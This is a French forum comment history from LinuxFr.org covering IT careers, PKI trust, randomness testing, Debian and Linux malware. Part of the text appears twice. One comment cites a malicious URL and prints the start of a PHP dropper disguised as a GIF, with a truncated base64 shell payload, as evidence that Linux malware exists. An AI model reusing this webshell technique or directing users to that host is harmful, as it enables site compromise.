C'est vieux et du temps a passé, mais concernant la formation, je me rends compte qu'il n'y a aucun enjeu.
On t'enverra toujours à droite à gauche sur des technos improbables du jour au lendemain.
On te considérera expert dans un domaine (et donc sans besoin de formation).
On t'enverra un jour dans une formation dont tu ignorais tout. comme "écriture web" alors que tu fais une appli lourde en python (si, si) (spoil: la formation était une formation SPIP)
Les formations sont considérées comme un cadeau ultime pour lequel tu devrais donner un rein et 180jours de congés.
Aucune formation ne va améliorer ton image de marque dans la boite ou ton salaire.
L'excuse du "trop qualifié", c'est "vu la misère qu'on va te payer, tu vas partir en courant".
Pour devenir chef de projet, oué, mais en changeant d'entreprise pour espérer un +20%. En restant dans la même boîte, tu conserves le même salaire, et souvent le même intitulé de poste, donc très difficile à vendre ensuite: "vous me dites être chef de projet, mais votre feuille de paye indique développeur junior, expliquez moi ça"
Depuis, je n'ai pas vraiment changé d'avis. Je code toujours, et comme toi, j'ai des missions de pissage de code. Et je ne code plus chez moi le soir, je traîne un peu sur internet, mais c'est tout.
On m'a souvent dit qu'il fallait absolument prendre la direction du management pour évoluer. Mais tous les gens que je connais qui sont devenu manager (pas qu'en informatique, aussi en ingénieur automobile par exemple) disent la même chose: manager, ce n'est plus coder (ou concevoir de l'usinage de pièces par exemple).
Tu fais de la paperasse, tu manages des gens, tu fais des tableaux de bord et des compte rendus, tu participes à plein de réunions, tu dois lécher un peu le N+1 pour avoir de l'info, tu dois te mettre bien avec la secrétaire du big boss pour avoir l'info avant les autres, etc, etc.. Ton métier initial? Éventuellement, tu peux choisir d'en faire encore un peu, mais ne rêve pas, tu n'est plus un grouillot d'exécutant, tu es un chef, un patron, un manager (à lire d'un air ironique).
Je crois qu'il n'y a pas de solution simple à ce problème. Le problème de l'info, c'est que c'est un peu trop théorisé aujourd'hui, que tout le monde est ingénieur, et que tout s'externalise.
Tout le monde est ingénieur: tu te retrouves à faire du boulot de sans diplôme, et c'est la jungle pour faire passer ses idées.
Tout est trop théorisé: en gros, on calcule des jours/hommes et le produit doit être fini.
tout s'externalise: tu es sous les directives de différents donneurs d'ordres qui s'en branlent de ton boulot, ils veulent juste le respect des délais, des livraisons et du payement.
Il parait qu'aux US les deux filières existent: la première technique, la seconde managériale. Et avoir 50 ans et coder c'est naturel pour eux, et c'est une expertise reconnue et qu'il faut écouter. En france, si as 30 ans tu n'es pas manager, c'est que tu es un raté qui culminera à 2000euros/mois dans le meilleur des cas.
Ca sent un peu le coup de buzz quand même. Avec les gros détails: "de 12h53 à 15h49" et le fait qu'une petite quantité de RIBs ont pu sortir.
Allez, je la fais longue, c'est sûrement encore une SQL injection bidon. Les admins l'ont vu (bravo sincère à eux), et ils ont bloqué le bouzin. Pas de quoi en faire un fromage.
Je peux faire pareil, hein: "Mon admin à courageusement résisté à des centaines d'attaques provenant de hacker chinois" car j'ai vu passer un scan de port sur mon firewall et un ssh scan.
Dans ce cas, on avait pas dit que le système pyramidal de certificat est tout cassé
Non. C'est plus compliqué et plus simple que ça. Le système actuel repose sur la confiance que tu places envers les autorités. Confiance dans le choix des algos, dans leurs implémentations, dans leur sécurité interne et dans leur mécanisme de délivrance de certificats.
Or, on s'aperçoit aujourd'hui que les autorités de confiance qui remplissent nos navigateurs ne sont malheureusement pas de confiances:
- Ils utilisent des algos dépassés (genre 512 bits encore récemment)
- Ils utilisent des méthodes moisies (genre signature MD5 + date + numéro de série prévisible)
- Ils se font pirater (genre diginotar)
- Ils signent n'importe quoi (même une demande pour mozilla.org provenant d'une boite mail intraçable, si, si)
- Ils disparaissent dans la nature (genre on a une CA dans le magasin, mais personne ne sait à qui elle appartient, ni qui en possède la clé)
- Ils sont trop nombreux (sérieux, pourquoi vous faites confiance à la poste turque ou a une boite thaïlandaise?)
- Ils sont plus intéressés par la vente rapide de certificats que par la vérification des demandeurs
- Ils ne fournissent pas tous OCSP (et avec des CRL de pleins de Mo, on ne les lit pas)
- etc, etc..
Donc, on peut dire que la confiance dans les CA est cassée, et donc que le mécanisme de certificat est cassé.
A part ça, si tu as vraiment confiance dans ta CA, alors le système de PKI est très efficace et marche très bien.
Tu parles en effet de preuve de code et non pas preuve de l'alea.
Le fait de ne pas connaître la graine initiale dans le noyau n'est pas le seul problème. "La sécurité de ces deux algorithmes est basée sur l'hypothèse qu'un attaquant ne connait pas l'état interne du générateur (qui est donc conservé dans le noyau)." Oui, mais l'attaquant peut connaitre une longue suite de valeurs générées.
Le second problème concerne la distribution de l'alea (et là, je ressors des vieux souvenirs de cours). On sait qu'une distribution aléatoire doit avoir des propriétés. On sait que l'on a:
La moyenne des valeurs aléatoires générées doit correspondre au milieu de la plage. Si on tire un très grand nombre de valeurs aléatoires entre 0 et 1000, la moyenne doit être autour de 500.
Problème: la suite suivante répond au critère mais n'est pas aléatoire: 499,501,499,501,499,501,…
Une autre hypothèse indique que chaque valeur doit avoir une équiprobabilité de sortie. Cela permet de dégager la suite du dessus, mais la suite: 1,2,3,4,5,6,7,…,1000 est parfaitement équiprobable sur 1000 tirages, mais n'est pas aléatoire.
On peut encore vérifier les écarts entre deux tirages successifs. Etc…
Au final, on se rend compte qu'on a plusieurs moyens simples d'écarter des mauvaise suites aléatoires ce qui permet de créer des tests de conformités, mais qu'on a pas de moyen sûr de prouver la bonne qualité de l'aléatoire. A l'époque mon prof ne jurait que par les sources hardwares de "bruit" et démontait systématiquement les sources purement logicielles.
Certes, mais c'est une seule interface pour toutes les mises à jour, pas chaque logiciel qui a son icône dans la zone de notification
J'ai un firefox récent (iceweasel? mouhahahah). Un chrome. Un metasploit qui n'existe pas dans les depots debian. D'autres outils dont la mise à jour auto marche mieux que les packages debian qui viennent seulement les nuits de pleine lune. Un acrobat reader sous linux (rigolez pas, je souffre). Et j'ai eu a utiliser une lib en version plus récente que celle packagée, donc tout à la mano.
Bref, un gros bouzin a mettre à jour.
En fait, ça ressemble à windows pour le coup. Un OS et quelques applicatifs qui se mettent à jour, le reste c'est à la va comme je te pousse.
On est pas dérangé tous les jours par une mise à jour "Acrobat" ou "Flash" ou "Antivirus" ou autre.
Euh, bah sous debian c'est au moins une fois par semaine, et de temps en temps tous les jours, donc bon.
Les disques réseaux, externes, tout le matériel se monte automatiquement au démarrage pour avoir un espace de travail immédiatement opérationnel
bwahahah, sous debian (encore), le réseau nfs se monte avant dnsmasq. Et comme mes résolutions de noms fonctionnent avec dnsmasq, ça pète à tous les démarrages. Mais là, ça tombe bien car je veux les monter à la demande. On va appeler ça une feature, donc.
Ah, oui, et là mon karma va en prendre un coup car sur linuxfr, il y a pire que de faire un journal sur le féminisme: c'est dire du mal de debian. (joke, troll, vendredi, toussa, patapé)
Allez, zou: sage-femme. Ca rabaisse parce que ça implique que toutes les femmes ne sont pas sages? Moi, je vois plutôt ça comme le fait que la noble profession qui a trait à l'accouchement est valorisante.
Bwahahah.
Etymologie de sage-femme: sage dans le sens, savoir, connaissance. Donc une personne qui connait bien les femmes. Ca tombe bien, elles sont consultées dans le cadre des accouchements qui est quand même plutôt féminin de manière générale.
Mais rien n'empêche qu'un homme ait une connaissance sur l'accouchement. Donc un homme sage-femme, ça ne me choque pas. Même si on entend parler de maïeuticien, allez donc chercher l'étymologie, c'est rigolo aussi.
Oui, et le coup de 'je bloque tout ce qui n'est pas connu et n'autorise que ce qui est explicitement autorisé', ça ne serait pas le fonctionnement de bit9? https://www.bit9.com/
C'est mal de se moquer, mais ils se sont fait pirater. La raison? Ils n'utilisent pas leurs propres produits sur leurs serveurs, et n'ont donc pas pu empêcher un pirate de leur voler leur clé de signature. Le pirate a donc pu signer du malware et le faire exécuter sur des machines protégées par Bit9 :-)
La bonne séparation des droits c'est aussi avoir un compte d'utilisation distinct du compte administrateur.
Ce qui est parfaitement inutile puisqu'il est inutile d'être admin pour te voler les logins de ta banque ou de distribuer du SPAM. Le lien que j'ai donné plus haut: http://picasa.com.playteck.net/indeks.php est un bon exemple de virus. Généralement le pirate n'est pas admin. Tu sais quoi, il ne cherche même pas à être admin, il s'en fout, il n'en a pas besoin.
Ça ne signifie pas que ce sont des virus qui ont permis l'attaque, je pense qu'il est bon de comprendre qu'une attaque informatique n'est pas uniquement due à un virus.
Ah, oui, j'oubliais. Comme on ne va pas appeler ça 'virus', on peut aller descendre dans la rue clamer haut et fort qu'il n'y a pas de 'virus' sous linux et que linux est fiable et sur ma bonne dame puisqu'il n'y a pas de 'virus'. Des machines linux sont remplies de code malveillants, les grandes boites se font percer, kernel.org a été percé, sourceforge, etc.. mais on continue de dire qu'il n'y a pas de 'virus' sous linux; la belle affaire.
Je ne comprends pas comment cette légende urbaine prospère encore de nos jours.. Ca date de win98, qui avait FAT32 comme filesystem. Ce filesystem ne gère pas les droits, et un virus pouvait donc taper dans le système. A l'époque, avec linux, on avait ext2, et un hypothétique virus avec des droits user n'aurait pas pu modifier le système.
Aujourd'hui, NTFS existe d'une part, et la plupart des distros linux balancent un sudo préconfiguré sans mot de passe, ce qui revient grosso modo au même point.
En puis un virus ne va pas forcément essayer de gagner des droits root, des droits users sont généralement suffisant pour te voler les login/pass de ta banque ou transformer ta machine en relais de SPAM.
Et l'histoire de l'usage propre, faut arrêter. Facebook s'est fait pigner son réseau en surfant sur un site de developpeur IOS légitime, NBC s'est fait pirater et s'est transformé en distributeur de vérole, et des agences de pub se font aussi pirater pour ajouter du code offensif sur n'importe quel site affichant ses pubs. Donc bon, si aller lire un site web de développeur ou lire des news n'est pas un usage "propre" alors je ne sais pas trop quoi conseiller.
Pour le sondage: Il y a 5mn.
Tout le monde imagine un petit virus "à la windows" et rigole en disant que ça n'existe pas sous linux, mais il en existe d'autres types.
Premier cas: on en parlait y'a pas 5mn, c'était même en main page de linuxfr avec du sshd vérolé: d'où il vient, et comment il se promène? Il y a de grandes chances que ce soit de manière automatique. Vous en voulez d'autres? J'en ai là: http://picasa.com.playteck.net/indeks.php
On note tout d'abord la présence d'esprit du pirate en utilisant un nom de domaine qui ressemble à un nom connu. Le pirate utilise une deuxième méthode d'évasion pour la détection:
Si vous d/l le fichier php et que vous faites un file, ça vous dit: $ file indeks.php
indeks.php: GIF image data, version 89a, 16129 x 16129
alors que quand on regarde dedans on retrouve du code php… $ cat indeks.php
GIF89a?????ÿÿÿ!ù????,???????D?;?<?php
@error_reporting(0); @set_time_limit(0); $lol = $_GET['lol']; $osc = $_GET['osc'];
$shell_data = "aWYgKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSBvciBzdHJ0b2xvd2VyKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSkgPT0 (snip...)
Un petit dropper pas trop méchant, je vous épargne les véritables attaques que je vois. Sauf que ce genre de trucs:
-ça se promène tout seul
-ça se duplique tout seul
-ça infecte du linux
Et ça, ça ressemble furieusement à la définition d'un virus sous linux.
Ca n'empêchera pas le piratage: pourquoi avoir un morceau d'album légal alors que le piratage t'en donnes un complet?
La diffusion complète et lente est plus intéressante à mon avis.
les 10 premières pages de BD te plaisent: soit tu payes 1 euro et tu la lis d'un traite, soit tu attends (48-10)*2 jours = 76 jours pour la lire gratuitement petit à petit. Et ça n'est pas 76 jours à date de parution, c'est 76 jours à date de lecture des 10 pages. Ca me parait très malin.
Je lis: "on a vraiment du mal à trouver un stagiaire correspondant au profil et qui soit motivé"
alors que quelques lignes au dessus, on trouve: "Le salaire est assez normal dans le milieu (voir faible)".
Bin voilà. Jeune diplômé sorti de l'école, on m'a aussi proposé des "super" postes payé des queues de cerise dans des labos de recherche (en plus généralement précaire CDD non renouvelable) et des postes dans le privé payés un salaire décent (et CDI). J'ai vite choisi: je suis devenu trader dans une grande banque et là j'ai les pieds dans la mer des bahamas HAHAHAHA (nan, je déconne, je suis dans le privé).
De plus, il est coutume et de bon ton pour les grandes entreprises de recruter du stagiaire avec comme salaire l'incommensurable possibilité d'écrire sur un CV avoir travaillé pour eux! Et il est de bon ton de râler contre ces pratiques. Là, on a pas le salaire, mais on a l'incommensurable honneur de pouvoir participer aux RMLL, étant payé de toute façon des clopinettes. Moué, bof. Et cerise sur le gâteau: on nous dit que dans ce labo, on peut ne pas travailler (faire du kayak), alors oui trouver un gars motivé par le fait d'aller faire du canoë n'est pas le meilleur moyen de trouver un codeur.
Je fais mon Gripsou, mais bah, tout travail mérite salaire, etc…
Tout le monde a entendu parler de Gérard qui est parti dans un pays plat pour des raisons bassement économiques.
Et tout le monde s'arrête au taux d'imposition de 85%. Certes. Sauf que personne ne précise combien il lui reste, une fois ces 85% versés. Et ça, c'est une information que j'aimerai bien connaître afin de mieux cerner l'indécence de ce monsieur.
Donc si quelqu'un sait, qu'il fasse tourner, ça me changera des ergotages sans fin sur ces 85% ou 83, ou si c'est possible ou non, etc…
Non mais c'est pas pour ça qu'on achète que des gateaux cuisiné par le gagnant du concour de meilleur artisant de France en prenant un air dédaigneux quand on passe devant une patisserie.
J'ai habité pendant 2 ans à côté d'un boulanger patissier chocolatier qui a été meilleur ouvrier de france et qui a eu pas mal d'autres prix. C'est incomparable. Je retourne encore quelque fois chez lui. Et oui, lorsque je vais prendre mon menu sandwich/boisson/dessert à la boulangerie à côté du boulot je regarde d'un air dédaigneux les gâteaux.
Pour moi, il y a quatre niveau:
Le crado, qu'à peu près tout le monde trouve dégueulasse d'un commun accord.
Le moyen, que tout le monde peut manger sans trop se poser de question.
Le bon, qui fait bien plaisir quand le mange/boit.
L'excellent, que seuls des amateurs éclairés vont savoir apprécier. Typiquement le vin d'une année spéciale. Certains vont s'en souvenir toute leur vie, pour d'autre ça sera "bon sans plus" ou "indifférent".
La différence entre le bon et l'excellent va varier grandement entre les individus. Par exemple, lorsqu'on boit trois cafés par semaine, on comprend pas pourquoi certains dépensent de l'argent dans une machine, un mode de filtration, un grain particulier.
Par exemple, je ne comprends pas trop les buveurs de vins (ouais, c'est bon, mais au delà de 6-8 euros la bouteille c'est du snobisme selon moi), mais je suis pour ma part extrêmement sensible aux eaux (j'arrive assez facilement à reconnaître une dizaine d'eaux minérales en aveugle). Et je suis toujours prêt à goûter des eaux de source ou de fontaine, et j'ai des gros souvenirs là dessus.
Tout ça pour dire que les goûts et les couleurs ça dépend des gens, il y en a même qui trouvent gnome3 joli, et d'autres qui discutent des heures sur la liberté d'une license.
[X] libre j'ai pas réfléchi, j'ai pensé que ça serait mieux
Pour faire du code et naviguer sur le web en écoutant du mp3, honnêtement, je n'ai pas cherché plus loin que le pilote libre, et je ne suis même pas sûr de vouloir savoir ce que j'ai en modèle.
Parfois, je ne comprends pas les auteurs de logiciels libres.
Pareil
On a deux projets prometteurs mais incomplets; au lieu de venir soutenir un de ces projets pour aboutir à un lecteur flash utilisable
Surtout que flash[1], c'est fini avec le refus d'apple[2] de l'intégrer à ses iDevices[3] ce en quoi il a trop eu raison[4]. Donc pourquoi chercher à créer un lecteur d'un format obsolète[5]? Peut-être qu'en 2017, lorsque flash ne sera plus utilisé que dans des coins d'archive.org[6] on pourra faire des jeux à 2 balles et regarder des vidéos de chatons[7].
[1] troll level spotted!
[2] troll increasing 125%
[3] Critical HIT!
[4] Overflow, overflow!
[5] Red zone! Entering red zone, Stahp!
[6] Core temperature near explosion!
[7] A new troll has spawned
[^] # Re: Ils ont de l'humour
Posté par octane . En réponse à la dépêche Première mise en demeure pour l'association LinuxFr. Évalué à 9.
Juste énorme!
L'histoire est quand même navrante à tout point de vue, mais entre les commentaires sur linuxfr et twitter, qu'est ce qu'on rigole :-)
[^] # Re: La filière technique et managériale
Posté par octane . En réponse au journal [HS] Développeur un peu perdu… ou pas… Que faire maintenant ? Changer de vie ?. Évalué à 6.
C'est vieux et du temps a passé, mais concernant la formation, je me rends compte qu'il n'y a aucun enjeu.
L'excuse du "trop qualifié", c'est "vu la misère qu'on va te payer, tu vas partir en courant".
Pour devenir chef de projet, oué, mais en changeant d'entreprise pour espérer un +20%. En restant dans la même boîte, tu conserves le même salaire, et souvent le même intitulé de poste, donc très difficile à vendre ensuite: "vous me dites être chef de projet, mais votre feuille de paye indique développeur junior, expliquez moi ça"
# La filière technique et managériale
Posté par octane . En réponse au journal [HS] Développeur un peu perdu… ou pas… Que faire maintenant ? Changer de vie ?. Évalué à 10.
J'avais écrit il y a quelque temps un journal: https://linuxfr.org/users/octane/journaux/programmez-vous-chez-vous
Depuis, je n'ai pas vraiment changé d'avis. Je code toujours, et comme toi, j'ai des missions de pissage de code. Et je ne code plus chez moi le soir, je traîne un peu sur internet, mais c'est tout.
On m'a souvent dit qu'il fallait absolument prendre la direction du management pour évoluer. Mais tous les gens que je connais qui sont devenu manager (pas qu'en informatique, aussi en ingénieur automobile par exemple) disent la même chose: manager, ce n'est plus coder (ou concevoir de l'usinage de pièces par exemple).
Tu fais de la paperasse, tu manages des gens, tu fais des tableaux de bord et des compte rendus, tu participes à plein de réunions, tu dois lécher un peu le N+1 pour avoir de l'info, tu dois te mettre bien avec la secrétaire du big boss pour avoir l'info avant les autres, etc, etc.. Ton métier initial? Éventuellement, tu peux choisir d'en faire encore un peu, mais ne rêve pas, tu n'est plus un grouillot d'exécutant, tu es un chef, un patron, un manager (à lire d'un air ironique).
Je crois qu'il n'y a pas de solution simple à ce problème. Le problème de l'info, c'est que c'est un peu trop théorisé aujourd'hui, que tout le monde est ingénieur, et que tout s'externalise.
Tout le monde est ingénieur: tu te retrouves à faire du boulot de sans diplôme, et c'est la jungle pour faire passer ses idées.
Tout est trop théorisé: en gros, on calcule des jours/hommes et le produit doit être fini.
tout s'externalise: tu es sous les directives de différents donneurs d'ordres qui s'en branlent de ton boulot, ils veulent juste le respect des délais, des livraisons et du payement.
Il parait qu'aux US les deux filières existent: la première technique, la seconde managériale. Et avoir 50 ans et coder c'est naturel pour eux, et c'est une expertise reconnue et qu'il faut écouter. En france, si as 30 ans tu n'es pas manager, c'est que tu es un raté qui culminera à 2000euros/mois dans le meilleur des cas.
# et le nom?
Posté par octane . En réponse au journal tontoncloud, tentative d'auto-hébergement #pourlesnuls.. Évalué à 8.
J'aurais bien choisi Dans Ton Cloud, pour faire des réparties pleines de finesse et de bon goût.
# moué.
Posté par octane . En réponse au journal [HS] Mediapart victime d'une attaque informatique. Évalué à -1.
Ca sent un peu le coup de buzz quand même. Avec les gros détails: "de 12h53 à 15h49" et le fait qu'une petite quantité de RIBs ont pu sortir.
Allez, je la fais longue, c'est sûrement encore une SQL injection bidon. Les admins l'ont vu (bravo sincère à eux), et ils ont bloqué le bouzin. Pas de quoi en faire un fromage.
Je peux faire pareil, hein: "Mon admin à courageusement résisté à des centaines d'attaques provenant de hacker chinois" car j'ai vu passer un scan de port sur mon firewall et un ssh scan.
[^] # Re: Pyramide
Posté par octane . En réponse au journal PKI open source: retours d'experience ?. Évalué à 7.
Non. C'est plus compliqué et plus simple que ça. Le système actuel repose sur la confiance que tu places envers les autorités. Confiance dans le choix des algos, dans leurs implémentations, dans leur sécurité interne et dans leur mécanisme de délivrance de certificats.
Or, on s'aperçoit aujourd'hui que les autorités de confiance qui remplissent nos navigateurs ne sont malheureusement pas de confiances:
- Ils utilisent des algos dépassés (genre 512 bits encore récemment)
- Ils utilisent des méthodes moisies (genre signature MD5 + date + numéro de série prévisible)
- Ils se font pirater (genre diginotar)
- Ils signent n'importe quoi (même une demande pour mozilla.org provenant d'une boite mail intraçable, si, si)
- Ils disparaissent dans la nature (genre on a une CA dans le magasin, mais personne ne sait à qui elle appartient, ni qui en possède la clé)
- Ils sont trop nombreux (sérieux, pourquoi vous faites confiance à la poste turque ou a une boite thaïlandaise?)
- Ils sont plus intéressés par la vente rapide de certificats que par la vérification des demandeurs
- Ils ne fournissent pas tous OCSP (et avec des CRL de pleins de Mo, on ne les lit pas)
- etc, etc..
Donc, on peut dire que la confiance dans les CA est cassée, et donc que le mécanisme de certificat est cassé.
A part ça, si tu as vraiment confiance dans ta CA, alors le système de PKI est très efficace et marche très bien.
# Validation de l'alea
Posté par octane . En réponse au journal Analyser la génération de nombre aléatoire du noyau. Évalué à 6.
Tu parles en effet de preuve de code et non pas preuve de l'alea.
Le fait de ne pas connaître la graine initiale dans le noyau n'est pas le seul problème. "La sécurité de ces deux algorithmes est basée sur l'hypothèse qu'un attaquant ne connait pas l'état interne du générateur (qui est donc conservé dans le noyau)." Oui, mais l'attaquant peut connaitre une longue suite de valeurs générées.
Le second problème concerne la distribution de l'alea (et là, je ressors des vieux souvenirs de cours). On sait qu'une distribution aléatoire doit avoir des propriétés. On sait que l'on a:
La moyenne des valeurs aléatoires générées doit correspondre au milieu de la plage. Si on tire un très grand nombre de valeurs aléatoires entre 0 et 1000, la moyenne doit être autour de 500.
Problème: la suite suivante répond au critère mais n'est pas aléatoire: 499,501,499,501,499,501,…
Une autre hypothèse indique que chaque valeur doit avoir une équiprobabilité de sortie. Cela permet de dégager la suite du dessus, mais la suite: 1,2,3,4,5,6,7,…,1000 est parfaitement équiprobable sur 1000 tirages, mais n'est pas aléatoire.
On peut encore vérifier les écarts entre deux tirages successifs. Etc…
Au final, on se rend compte qu'on a plusieurs moyens simples d'écarter des mauvaise suites aléatoires ce qui permet de créer des tests de conformités, mais qu'on a pas de moyen sûr de prouver la bonne qualité de l'aléatoire. A l'époque mon prof ne jurait que par les sources hardwares de "bruit" et démontait systématiquement les sources purement logicielles.
[^] # Re: la sobriété
Posté par octane . En réponse au sondage Selon vous, quel est l'avantage d'un système libre type GNU/Linux sur un ordinateur de bureau ?. Évalué à -10.
J'ai un firefox récent (iceweasel? mouhahahah). Un chrome. Un metasploit qui n'existe pas dans les depots debian. D'autres outils dont la mise à jour auto marche mieux que les packages debian qui viennent seulement les nuits de pleine lune. Un acrobat reader sous linux (rigolez pas, je souffre). Et j'ai eu a utiliser une lib en version plus récente que celle packagée, donc tout à la mano.
Bref, un gros bouzin a mettre à jour.
En fait, ça ressemble à windows pour le coup. Un OS et quelques applicatifs qui se mettent à jour, le reste c'est à la va comme je te pousse.
[^] # Re: la sobriété
Posté par octane . En réponse au sondage Selon vous, quel est l'avantage d'un système libre type GNU/Linux sur un ordinateur de bureau ?. Évalué à 1. Dernière modification le 18 mars 2013 à 15:47.
J'ai une debian, et:
Euh, bah sous debian c'est au moins une fois par semaine, et de temps en temps tous les jours, donc bon.
bwahahah, sous debian (encore), le réseau nfs se monte avant dnsmasq. Et comme mes résolutions de noms fonctionnent avec dnsmasq, ça pète à tous les démarrages. Mais là, ça tombe bien car je veux les monter à la demande. On va appeler ça une feature, donc.
Ah, oui, et là mon karma va en prendre un coup car sur linuxfr, il y a pire que de faire un journal sur le féminisme: c'est dire du mal de debian. (joke, troll, vendredi, toussa, patapé)
[^] # Re: Sur l'extension des genres grammaticaux en français
Posté par octane . En réponse au journal [Attention, journal bookmark ET féministe] Tiens, prends ça, tu le mérites !. Évalué à 7.
Bwahahah.
Etymologie de sage-femme: sage dans le sens, savoir, connaissance. Donc une personne qui connait bien les femmes. Ca tombe bien, elles sont consultées dans le cadre des accouchements qui est quand même plutôt féminin de manière générale.
Mais rien n'empêche qu'un homme ait une connaissance sur l'accouchement. Donc un homme sage-femme, ça ne me choque pas. Même si on entend parler de maïeuticien, allez donc chercher l'étymologie, c'est rigolo aussi.
[^] # Re: 1181
Posté par octane . En réponse à la dépêche Jeudi du libre de mars 2013 à Lyon : sécurisez vos communications avec OpenPGP. Évalué à 2. Dernière modification le 15 septembre 2024 à 10:33.
Pour ceux qui moinssent le commentaire du dessus, voici l'explication :
http://xkcd.com/1181/
[^] # Re: Une blague
Posté par octane . En réponse au journal Davfi, le premier antivirus libre français.. Évalué à 6.
Oui, et le coup de 'je bloque tout ce qui n'est pas connu et n'autorise que ce qui est explicitement autorisé', ça ne serait pas le fonctionnement de bit9?
https://www.bit9.com/
C'est mal de se moquer, mais ils se sont fait pirater. La raison? Ils n'utilisent pas leurs propres produits sur leurs serveurs, et n'ont donc pas pu empêcher un pirate de leur voler leur clé de signature. Le pirate a donc pu signer du malware et le faire exécuter sur des machines protégées par Bit9 :-)
[^] # Re: Comment savoir ?
Posté par octane . En réponse au sondage La dernière fois que j'ai vu un virus/vers concernant Linux. Évalué à 2.
Ce qui est parfaitement inutile puisqu'il est inutile d'être admin pour te voler les logins de ta banque ou de distribuer du SPAM. Le lien que j'ai donné plus haut: http://picasa.com.playteck.net/indeks.php est un bon exemple de virus. Généralement le pirate n'est pas admin. Tu sais quoi, il ne cherche même pas à être admin, il s'en fout, il n'en a pas besoin.
Ah, oui, j'oubliais. Comme on ne va pas appeler ça 'virus', on peut aller descendre dans la rue clamer haut et fort qu'il n'y a pas de 'virus' sous linux et que linux est fiable et sur ma bonne dame puisqu'il n'y a pas de 'virus'. Des machines linux sont remplies de code malveillants, les grandes boites se font percer, kernel.org a été percé, sourceforge, etc.. mais on continue de dire qu'il n'y a pas de 'virus' sous linux; la belle affaire.
[^] # Re: Comment savoir ?
Posté par octane . En réponse au sondage La dernière fois que j'ai vu un virus/vers concernant Linux. Évalué à 5.
"La bonne séparation des droits"
Je ne comprends pas comment cette légende urbaine prospère encore de nos jours.. Ca date de win98, qui avait FAT32 comme filesystem. Ce filesystem ne gère pas les droits, et un virus pouvait donc taper dans le système. A l'époque, avec linux, on avait ext2, et un hypothétique virus avec des droits user n'aurait pas pu modifier le système.
Aujourd'hui, NTFS existe d'une part, et la plupart des distros linux balancent un sudo préconfiguré sans mot de passe, ce qui revient grosso modo au même point.
En puis un virus ne va pas forcément essayer de gagner des droits root, des droits users sont généralement suffisant pour te voler les login/pass de ta banque ou transformer ta machine en relais de SPAM.
Et l'histoire de l'usage propre, faut arrêter. Facebook s'est fait pigner son réseau en surfant sur un site de developpeur IOS légitime, NBC s'est fait pirater et s'est transformé en distributeur de vérole, et des agences de pub se font aussi pirater pour ajouter du code offensif sur n'importe quel site affichant ses pubs. Donc bon, si aller lire un site web de développeur ou lire des news n'est pas un usage "propre" alors je ne sais pas trop quoi conseiller.
# Il y en a partout!
Posté par octane . En réponse au sondage La dernière fois que j'ai vu un virus/vers concernant Linux. Évalué à 10.
Pour le sondage: Il y a 5mn.
Tout le monde imagine un petit virus "à la windows" et rigole en disant que ça n'existe pas sous linux, mais il en existe d'autres types.
Premier cas: on en parlait y'a pas 5mn, c'était même en main page de linuxfr avec du sshd vérolé: d'où il vient, et comment il se promène? Il y a de grandes chances que ce soit de manière automatique. Vous en voulez d'autres? J'en ai là:
http://picasa.com.playteck.net/indeks.php
On note tout d'abord la présence d'esprit du pirate en utilisant un nom de domaine qui ressemble à un nom connu. Le pirate utilise une deuxième méthode d'évasion pour la détection:
Si vous d/l le fichier php et que vous faites un file, ça vous dit:
$ file indeks.php
indeks.php: GIF image data, version 89a, 16129 x 16129
alors que quand on regarde dedans on retrouve du code php…
$ cat indeks.php
GIF89a?????ÿÿÿ!ù????,???????D?;?<?php
@error_reporting(0); @set_time_limit(0); $lol = $_GET['lol']; $osc = $_GET['osc'];
$shell_data = "aWYgKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSBvciBzdHJ0b2xvd2VyKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSkgPT0 (snip...)
Un petit dropper pas trop méchant, je vous épargne les véritables attaques que je vois. Sauf que ce genre de trucs:
-ça se promène tout seul
-ça se duplique tout seul
-ça infecte du linux
Et ça, ça ressemble furieusement à la définition d'un virus sous linux.
[^] # Re: Pas besoin de découpe
Posté par octane . En réponse au journal Mise à disposition progressive du contenu: bonne idée.. Évalué à 2.
Ca n'empêchera pas le piratage: pourquoi avoir un morceau d'album légal alors que le piratage t'en donnes un complet?
La diffusion complète et lente est plus intéressante à mon avis.
[^] # Re: Lapin compris
Posté par octane . En réponse au journal Mise à disposition progressive du contenu: bonne idée.. Évalué à 9.
Ca me parait simple:
les 10 premières pages de BD te plaisent: soit tu payes 1 euro et tu la lis d'un traite, soit tu attends (48-10)*2 jours = 76 jours pour la lire gratuitement petit à petit. Et ça n'est pas 76 jours à date de parution, c'est 76 jours à date de lecture des 10 pages. Ca me parait très malin.
# Je vais faire mon Gripsou, mais:
Posté par octane . En réponse au journal [Stage] Conception d'IHM et développement d'une application de suivi de news en rails. Évalué à 10.
Je lis: "on a vraiment du mal à trouver un stagiaire correspondant au profil et qui soit motivé"
alors que quelques lignes au dessus, on trouve: "Le salaire est assez normal dans le milieu (voir faible)".
Bin voilà. Jeune diplômé sorti de l'école, on m'a aussi proposé des "super" postes payé des queues de cerise dans des labos de recherche (en plus généralement précaire CDD non renouvelable) et des postes dans le privé payés un salaire décent (et CDI). J'ai vite choisi: je suis devenu trader dans une grande banque et là j'ai les pieds dans la mer des bahamas HAHAHAHA (nan, je déconne, je suis dans le privé).
De plus, il est coutume et de bon ton pour les grandes entreprises de recruter du stagiaire avec comme salaire l'incommensurable possibilité d'écrire sur un CV avoir travaillé pour eux! Et il est de bon ton de râler contre ces pratiques. Là, on a pas le salaire, mais on a l'incommensurable honneur de pouvoir participer aux RMLL, étant payé de toute façon des clopinettes. Moué, bof. Et cerise sur le gâteau: on nous dit que dans ce labo, on peut ne pas travailler (faire du kayak), alors oui trouver un gars motivé par le fait d'aller faire du canoë n'est pas le meilleur moyen de trouver un codeur.
Je fais mon Gripsou, mais bah, tout travail mérite salaire, etc…
[^] # Re: \o\ .. /o/ Fuuuuuuuuusion! /o/\o\ .... \o/
Posté par octane . En réponse au journal Le patron de l'agence de contrôle nucléaire Belge sceptique sur le nucléaire.. Évalué à 2.
Dragonball!!
Et désolé pour la qualité pourrie http://dragonball.wikia.com/wiki/File:Fusion(UB22).png
Et je ferme la parenthèse, xkcd, tout ça )
# A ce sujet
Posté par octane . En réponse au journal Attention, journal bookmark. Évalué à 5.
Tout le monde a entendu parler de Gérard qui est parti dans un pays plat pour des raisons bassement économiques.
